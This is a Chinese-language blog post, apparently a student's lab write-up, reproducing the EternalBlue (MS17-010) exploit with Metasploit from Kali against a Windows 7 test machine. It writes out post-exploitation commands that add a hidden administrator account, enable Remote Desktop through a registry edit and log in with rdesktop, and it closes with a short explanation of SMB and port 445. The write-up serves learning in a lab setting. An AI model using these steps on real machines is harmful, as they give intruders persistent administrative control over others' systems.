永恒之蓝漏洞复现

准备:

攻击机:kali

靶机:Windows7

配置:确保双方能够互ping成功

ifconfig命令查看Kali的IP地址

 ipconfig查看Windows7的IP地址

 双方都可以互ping成功

 我用到的软件是Kali中的metasploitframework软件

 search ms17-010搜索ms17-010这个漏洞

 给我了几个漏洞方法,我是一个一个试的,最后发现第0个可以使用成功

 shell命令进入Windows7的命令行

 可以看到我已经进入到了

C:\Windows\system32>

这个操作系统了。但是它有乱码,用chcp 65001命令调整一下。接着ipconfig命令查看windows7的操作命令。

这就是我们之前win7的操作页面了。

同样的我用netstat命令在win7查看连接情况,发现我的Kali已经连接上了这个win7,通过TCP

 用net user zd 123456 /add命令来创建一个名为zd,密码为123456的用户。

 用net localgroup administrators zd /add把zd用户设置为Windows7中的最高管理员权限的一个账户了

然后我们还要开启Windows7的远程功能,才能够控制这个win7,

用以下的命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

 开启了远程功能后就可以用rdesktop 192.168.217.132命令来访问Windows7的桌面了

然后其他用其他用户登录我们刚刚创建的zd用户就可以登录啦

成功登录到卓面

 那么Windows7原来的用户就会被剔下来了

总结:永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

我们要确保靶机的445端口是打开的。

通过这次复现让我简单的认识了渗透。

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值